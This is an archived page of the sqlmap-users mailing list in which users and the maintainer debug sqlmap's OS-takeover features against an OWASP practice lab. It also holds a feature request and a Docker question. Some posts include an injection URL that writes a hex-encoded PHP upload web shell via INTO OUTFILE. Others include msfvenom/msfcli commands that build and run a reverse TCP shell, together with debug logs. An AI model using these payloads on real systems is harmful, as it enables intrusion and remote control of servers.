sqlmap-users Mailing List for sqlmap (Page 10)
Brought to you by:
inquisb
From: Andres R. <and...@gm...> - 2015-07-22 12:16:48

List,

Has anyone created a Docker image for the sqlmap testenv [0]? I'm in the process of migrating all the test apps we use for the w3af build process to Docker and was wondering if maybe someone already did this.

[0] https://github.com/sqlmapproject/testenv
[1] https://github.com/andresriancho/w3af/issues/11353

Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Miroslav S. <mir...@gm...> - 2015-07-22 11:39:14

Can you please go to "sqlmap/extra/beep" and from there run:

python -vv beep.py > /tmp/run.txt 2>&1

...and send me back the content of the file /tmp/run.txt?

Bye

On Sun, Jul 19, 2015 at 4:42 PM, Vojtěch Polášek <kr...@gm...> wrote:
> Hi,
> I am running latest Sqlmap from Git and I am receiving SigSegv while
> using --beep parameter.
> I don't know what other information I should provide. Without --beep,
> everything is working as expected.
> Please feel free to ask me for more info.
> Thanks,
> Vojta
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
http://about.me/stamparm
From: Vojtěch P. <kr...@gm...> - 2015-07-22 11:29:00

Hi,
I am running the latest sqlmap from Git and I am receiving a SIGSEGV while using the --beep parameter. I don't know what other information I should provide. Without --beep, everything is working as expected.
Please feel free to ask me for more info.
Thanks,
Vojta
From: Miroslav S. <mir...@gm...> - 2015-07-13 21:57:01

Hi.

Now, with the latest commit:

    --beep    Beep on question and/or when SQL injection is found

Bye

On Mon, Jul 13, 2015 at 5:27 PM, Vojtěch Polášek <kr...@gm...> wrote:
> Greetings,
> I am doing very thorough tests which take usually several hours per one
> URL.
> Sometimes, Sqlmap asks me some question during the test. I am blind so
> unfortunately, sometimes I don't notice this early enough and I lose
> time and sometimes my session expires etc.
> I know there is a --beep option which makes a beep when SQL injection is
> found. But this is not enough for me, because most of questions aren't
> actual SQL injections.
> Could you please add some option to make beep whenever some prompt appears?
> Thanks,
> Vojta
>

--
Miroslav Stampar
http://about.me/stamparm
From: Vojtěch P. <kr...@gm...> - 2015-07-13 15:27:27

Greetings,
I am doing very thorough tests which usually take several hours per URL. Sometimes, sqlmap asks me some question during the test. I am blind so unfortunately, sometimes I don't notice this early enough and I lose time, and sometimes my session expires etc.
I know there is a --beep option which makes a beep when an SQL injection is found. But this is not enough for me, because most of the questions aren't actual SQL injections.
Could you please add some option to make a beep whenever some prompt appears?
Thanks,
Vojta
From: Miroslav S. <mir...@gm...> - 2015-07-06 10:06:43

Not able to reproduce. Can you please send the complete output of -v 3 (even the "executing local command" parts). It seems that you are either getting the binary shellcodeexec payload (I am getting the alphanum in both msfvenom and non-msfvenom environments) or the remote path contains non-ASCII chars.

Bye

On Sun, Jul 5, 2015 at 7:41 AM, Danux <da...@gm...> wrote:
> Got another error when trying to use the metasploit reverse shell option
> either default shell or Meterpreter, below the run:
>
> which payload do you want to use?
> [1] Shell (default)
> [2] Meterpreter (beta)
> > 1
> [22:36:39] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfvenom -p linux/x86/shell/reverse_tcp
> EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 -a x86 -e x86/alpha_mixed
> -f raw > "/root/.sqlmap/output/cstt/tmpmgspp" BufferRegister=EAX
> [22:36:39] [INFO] creation in progress ..... done
> [22:36:44] [DEBUG] the shellcode size is 102 bytes
> what is the back-end database management system architecture?
> [1] 32-bit (default)
> [2] 64-bit
> > 1
> [22:36:47] [INFO] uploading shellcodeexec to '/tmp/tmpsegspp'
> [22:36:47] [INFO] shellcodeexec successfully uploaded
> [22:36:47] [INFO] running Metasploit Framework command line interface
> locally, please wait..
> [22:36:47] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfcli multi/handler
> PAYLOAD=linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000
> LHOST=192.168.184.217 E
> [*] Initializing modules...
> PAYLOAD => linux/x86/shell/reverse_tcp
> EXITFUNC => process
> LPORT => 3000
> LHOST => 192.168.184.217
> [*] Started reverse handler on 192.168.184.217:3000
> [*] Starting the payload handler...
> [22:36:51] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [22:36:51] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 6 times
> [22:36:51] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
> that some kind of protection is involved (e.g. WAF)
>
> [22:36:52] [CRITICAL] unhandled exception occurred in
> sqlmap/1.0-dev-96327b6. It is recommended to retry your run with the latest
> development version from official GitHub repository at '
> https://github.com/sqlmapproject/sqlmap'. If the exception persists,
> please open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any other information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you
> sqlmap version: 1.0-dev-96327b6
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u
> *********************************************************************
> --os-pwn --msf-path /usr/share/metasploit-framework/ -v3
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap", line 102, in main
>     start()
>   File "lib/controller/controller.py", line 617, in start
>     action()
>   File "lib/controller/action.py", line 163, in action
>     conf.dbmsHandler.osPwn()
>   File "plugins/generic/takeover.py", line 261, in osPwn
>     self.pwn(goUdf)
>   File "lib/takeover/metasploit.py", line 651, in pwn
>     debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func)
>   File "lib/takeover/metasploit.py", line 533, in _controlMsfCmd
>     func()
>   File "lib/takeover/metasploit.py", line 434, in _runMsfShellcodeRemoteViaSexec
>     cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x89 in position 0:
> ordinal not in range(128)
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm
From: Danux <da...@gm...> - 2015-07-05 05:41:15

Got another error when trying to use the metasploit reverse shell option, either default shell or Meterpreter; below the run:

which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[22:36:39] [DEBUG] executing local command: /usr/share/metasploit-framework/msfvenom -p linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 -a x86 -e x86/alpha_mixed -f raw > "/root/.sqlmap/output/cstt/tmpmgspp" BufferRegister=EAX
[22:36:39] [INFO] creation in progress ..... done
[22:36:44] [DEBUG] the shellcode size is 102 bytes
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[22:36:47] [INFO] uploading shellcodeexec to '/tmp/tmpsegspp'
[22:36:47] [INFO] shellcodeexec successfully uploaded
[22:36:47] [INFO] running Metasploit Framework command line interface locally, please wait..
[22:36:47] [DEBUG] executing local command: /usr/share/metasploit-framework/msfcli multi/handler PAYLOAD=linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 E
[*] Initializing modules...
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => process
LPORT => 3000
LHOST => 192.168.184.217
[*] Started reverse handler on 192.168.184.217:3000
[*] Starting the payload handler...
[22:36:51] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[22:36:51] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 6 times
[22:36:51] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

[22:36:52] [CRITICAL] unhandled exception occurred in sqlmap/1.0-dev-96327b6. It is recommended to retry your run with the latest development version from official GitHub repository at 'https://github.com/sqlmapproject/sqlmap'. If the exception persists, please open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any other information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you
sqlmap version: 1.0-dev-96327b6
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u ********************************************************************* --os-pwn --msf-path /usr/share/metasploit-framework/ -v3
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap", line 102, in main
    start()
  File "lib/controller/controller.py", line 617, in start
    action()
  File "lib/controller/action.py", line 163, in action
    conf.dbmsHandler.osPwn()
  File "plugins/generic/takeover.py", line 261, in osPwn
    self.pwn(goUdf)
  File "lib/takeover/metasploit.py", line 651, in pwn
    debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func)
  File "lib/takeover/metasploit.py", line 533, in _controlMsfCmd
    func()
  File "lib/takeover/metasploit.py", line 434, in _runMsfShellcodeRemoteViaSexec
    cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
UnicodeDecodeError: 'ascii' codec can't decode byte 0x89 in position 0: ordinal not in range(128)

--
DanUx
From: Danux <da...@gm...> - 2015-07-05 00:47:46

That was fast! Thanks Miroslav. Great tool!

On Sat, Jul 4, 2015 at 4:47 PM, Miroslav Stampar <mir...@gm...> wrote:
> Thank you for your report. Fixed with the latest revision (
> https://github.com/sqlmapproject/sqlmap/issues/1290)
>
> Bye
>
> On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote:
>
>> With yours is not throwing the error, you can reproduce my case with the
>> owasppractice examples, I am attaching the source code here, you will need
>> to setup the DB. Once up and running try lesson03:
>>
>> sqlmap.py -u
>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>> --os-shel l--prefix "\")" -v3
>>
>> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
>> payloads specific for other DBMSes? [Y/n]
>> Y
>> for the remaining tests, do you want to include all tests for 'MySQL'
>> extending provided level (1) and risk (1) values? [Y/n]
>> n
>>
>> And should get the same error handling issue.
>>
>> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <mir...@gm...> wrote:
>>
>>> Something is really wrong happening here. One user is having the
>>> identical problem like you (AttributeError: 'NoneType' object has no
>>> attribute 'replace') and I am not able to reproduce.
>>>
>>> Can you please rerun your sqlmap version with "
>>> http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get
>>> the same error?
>>>
>>> Bye
>>>
>>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:
>>>
>>>> Just clone git and got 1.0-dev-166dc98 version but got a unhandled
>>>> exception error:
>>>>
>>>> ./sqlmap.py -u
>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>>>> --os-shell --prefix "\")" --flush-session -v3
>>>>
>>>> /sqlmap'. If the exception persists, please open a new issue at '
>>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> text and any other information required to reproduce the bug. The
>>>> developers will try to reproduce the bug, fix it accordingly and get back
>>>> to you
>>>> sqlmap version: 1.0-dev-166dc98
>>>> Python version: 2.7.3
>>>> Operating system: posix
>>>> Command line: sqlmap.py -u
>>>> *********************************************************************
>>>> --os-shell --prefix ") --flush-session -v3
>>>> Technique: None
>>>> Back-end DBMS: MySQL (fingerprinted)
>>>> Traceback (most recent call last):
>>>>   File "sqlmap.py", line 102, in main
>>>>     start()
>>>>   File "lib/controller/controller.py", line 514, in start
>>>>     injection = checkSqlInjection(place, parameter, value)
>>>>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>>>>     reqPayload = agent.payload(place, parameter, newValue=boundPayload,
>>>> where=where)
>>>>   File "lib/core/agent.py", line 188, in payload
>>>>     retVal = _(regex, "%s=%s" % (parameter,
>>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>>
>>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>
>>>>> I believe that you are using an old revision. For a long time there is
>>>>> at least a git revision or a pseudo "non-git" number appearing when "sqlmap
>>>>> --version" is being used.
>>>>>
>>>>> Please update to the latest revision from the official github
>>>>> repository and rerun the sqlmap.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>>>>
>>>>>> Thanks
>>>>>>
>>>>>> sqlmap --version
>>>>>> sqlmap/1.0-dev
>>>>>>
>>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>>
>>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>
>>>>>>> Which revision/version of sqlmap do you use? There has been a
>>>>>>> related patch a month ago. Will check tomorrow.
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>>>>
>>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>>>>
>>>>>>>> Description:
>>>>>>>>
>>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every
>>>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and
>>>>>>>> therefore not able to upload the web shell.
>>>>>>>>
>>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%[...]--+
>>>>>>>>
>>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>>
>>>>>>>> mysql> select 'ss' into outfile
>>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>>> ERROR 1086 (HY000): File
>>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>>
>>>>>>>> Solution:
>>>>>>>>
>>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at
>>>>>>>> least when using the -os-shell option
>>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>>
>>>>>>>> --
>>>>>>>> DanUx
>>>>>>>
>>>>>>> --
>>>>>>> Miroslav Stampar
>>>>>>> http://about.me/stamparm
>>>>>>
>>>>>> --
>>>>>> DanUx
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>
>>>> --
>>>> DanUx
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>
>> --
>> DanUx
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
DanUx
From: Miroslav S. <mir...@gm...> - 2015-07-04 23:47:48

Thank you for your report. Fixed with the latest revision (https://github.com/sqlmapproject/sqlmap/issues/1290)

Bye

On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote:
> With yours is not throwing the error, you can reproduce my case with the
> owasppractice examples, I am attaching the source code here, you will need
> to setup the DB. Once up and running try lesson03:
>
> sqlmap.py -u
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
> --os-shel l--prefix "\")" -v3
>
> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
> payloads specific for other DBMSes? [Y/n]
> Y
> for the remaining tests, do you want to include all tests for 'MySQL'
> extending provided level (1) and risk (1) values? [Y/n]
> n
>
> And should get the same error handling issue.
>
> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Something is really wrong happening here. One user is having the
>> identical problem like you (AttributeError: 'NoneType' object has no
>> attribute 'replace') and I am not able to reproduce.
>>
>> Can you please rerun your sqlmap version with "
>> http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get
>> the same error?
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:
>>
>>> Just clone git and got 1.0-dev-166dc98 version but got a unhandled
>>> exception error:
>>>
>>> ./sqlmap.py -u
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>>> --os-shell --prefix "\")" --flush-session -v3
>>>
>>> /sqlmap'. If the exception persists, please open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any other information required to reproduce the bug. The
>>> developers will try to reproduce the bug, fix it accordingly and get back
>>> to you
>>> sqlmap version: 1.0-dev-166dc98
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -u
>>> *********************************************************************
>>> --os-shell --prefix ") --flush-session -v3
>>> Technique: None
>>> Back-end DBMS: MySQL (fingerprinted)
>>> Traceback (most recent call last):
>>>   File "sqlmap.py", line 102, in main
>>>     start()
>>>   File "lib/controller/controller.py", line 514, in start
>>>     injection = checkSqlInjection(place, parameter, value)
>>>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>>>     reqPayload = agent.payload(place, parameter, newValue=boundPayload,
>>> where=where)
>>>   File "lib/core/agent.py", line 188, in payload
>>>     retVal = _(regex, "%s=%s" % (parameter,
>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>
>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>>> I believe that you are using an old revision. For a long time there is
>>>> at least a git revision or a pseudo "non-git" number appearing when "sqlmap
>>>> --version" is being used.
>>>>
>>>> Please update to the latest revision from the official github
>>>> repository and rerun the sqlmap.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>>>
>>>>> Thanks
>>>>>
>>>>> sqlmap --version
>>>>> sqlmap/1.0-dev
>>>>>
>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>
>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>>> Which revision/version of sqlmap do you use? There has been a related
>>>>>> patch a month ago. Will check tomorrow.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>>>
>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>>>
>>>>>>> Description:
>>>>>>>
>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every
>>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and
>>>>>>> therefore not able to upload the web shell.
>>>>>>>
>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%[...]--+
>>>>>>>
>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>
>>>>>>> mysql> select 'ss' into outfile
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>> ERROR 1086 (HY000): File
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>
>>>>>>> Solution:
>>>>>>>
>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>>>> when using the -os-shell option
>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>
>>>>>>> --
>>>>>>> DanUx
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>
>>>>> --
>>>>> DanUx
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>> --
>>> DanUx
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2015-07-04 23:01:56

Something is really wrong happening here. One user is having the identical problem like you (AttributeError: 'NoneType' object has no attribute 'replace') and I am not able to reproduce.

Can you please rerun your sqlmap version with "http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get the same error?

Bye

On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:
> Just clone git and got 1.0-dev-166dc98 version but got a unhandled
> exception error:
>
> ./sqlmap.py -u
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
> --os-shell --prefix "\")" --flush-session -v3
>
> /sqlmap'. If the exception persists, please open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any other information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you
> sqlmap version: 1.0-dev-166dc98
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -u
> *********************************************************************
> --os-shell --prefix ") --flush-session -v3
> Technique: None
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 102, in main
>     start()
>   File "lib/controller/controller.py", line 514, in start
>     injection = checkSqlInjection(place, parameter, value)
>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>     reqPayload = agent.payload(place, parameter, newValue=boundPayload,
> where=where)
>   File "lib/core/agent.py", line 188, in payload
>     retVal = _(regex, "%s=%s" % (parameter,
> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
> AttributeError: 'NoneType' object has no attribute 'replace'
>
> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> I believe that you are using an old revision. For a long time there is at
>> least a git revision or a pseudo "non-git" number appearing when "sqlmap
>> --version" is being used.
>>
>> Please update to the latest revision from the official github repository
>> and rerun the sqlmap.
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>
>>> Thanks
>>>
>>> sqlmap --version
>>> sqlmap/1.0-dev
>>>
>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>
>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>>> Which revision/version of sqlmap do you use? There has been a related
>>>> patch a month ago. Will check tomorrow.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>
>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>
>>>>> Description:
>>>>>
>>>>> A specific PAYLOAD (see below) used to upload a web shell will create
>>>>> an empty file e.g. tmpbezff.php, this will cause that every subsequent
>>>>> PAYLOAD attempt will fail with an "already exist" error and therefore not
>>>>> able to upload the web shell.
>>>>>
>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>>>
>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>
>>>>> mysql> select 'ss' into outfile
>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
>>>>> already exists
>>>>>
>>>>> Solution:
>>>>>
>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>> when using the -os-shell option
>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>
>>>>> --
>>>>> DanUx
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>> --
>>> DanUx
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm
From: Danux <da...@gm...> - 2015-07-04 22:57:34
|
Just cloned git and got the 1.0-dev-166dc98 version, but got an unhandled exception error:

./sqlmap.py -u http://OwaspPractice/injection/lessons/lesson03/index.php?code=N --os-shell --prefix "\")" --flush-session -v3

/sqlmap'. If the exception persists, please open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any other information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you

sqlmap version: 1.0-dev-166dc98
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -u ********************************************************************* --os-shell --prefix ") --flush-session -v3
Technique: None
Back-end DBMS: MySQL (fingerprinted)

Traceback (most recent call last):
  File "sqlmap.py", line 102, in main
    start()
  File "lib/controller/controller.py", line 514, in start
    injection = checkSqlInjection(place, parameter, value)
  File "lib/controller/checks.py", line 391, in checkSqlInjection
    reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
  File "lib/core/agent.py", line 188, in payload
    retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
AttributeError: 'NoneType' object has no attribute 'replace'

On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...> wrote:

> I believe that you are using an old revision. For a long time there is at least a git revision or a pseudo "non-git" number appearing when "sqlmap --version" is being used.
>
> Please update to the latest revision from the official github repository and rerun the sqlmap.
>
> Bye
>
> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>
>> Thanks
>>
>> sqlmap --version
>> sqlmap/1.0-dev
>>
>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>
>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>>
>>> Which revision/version of sqlmap do you use? There has been a related patch a month ago. Will check tomorrow.
>>>
>>> Bye
>>>
>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>
>>>> Hello list, there is an issue with sqlmap when using the --os-shell option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>
>>>> Description:
>>>>
>>>> A specific PAYLOAD (see below) used to upload a web shell will create an empty file, e.g. tmpbezff.php; this causes every subsequent PAYLOAD attempt to fail with an "already exists" error and therefore the web shell cannot be uploaded.
>>>>
>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%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--+
>>>>
>>>> By default, MySQL will throw an error if the file already exists:
>>>>
>>>> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>
>>>> Solution:
>>>>
>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least when using the -os-shell option
>>>> 2. Fix the PAYLOAD causing problems.
>>>>
>>>> --
>>>> DanUx
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>
>> --
>> DanUx
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
DanUx |
From: Miroslav S. <mir...@gm...> - 2015-07-04 22:44:04
|
I believe that you are using an old revision. For a long time there is at least a git revision or a pseudo "non-git" number appearing when "sqlmap --version" is being used.

Please update to the latest revision from the official github repository and rerun the sqlmap.

Bye

On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:

> Thanks
>
> sqlmap --version
> sqlmap/1.0-dev
>
> In the meantime I will patch procs/mysql/write_file_limit.sql
>
> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Which revision/version of sqlmap do you use? There has been a related patch a month ago. Will check tomorrow.
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>
>>> Hello list, there is an issue with sqlmap when using the --os-shell option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>
>>> Description:
>>>
>>> A specific PAYLOAD (see below) used to upload a web shell will create an empty file, e.g. tmpbezff.php; this causes every subsequent PAYLOAD attempt to fail with an "already exists" error and therefore the web shell cannot be uploaded.
>>>
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%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--+
>>>
>>> By default, MySQL will throw an error if the file already exists:
>>>
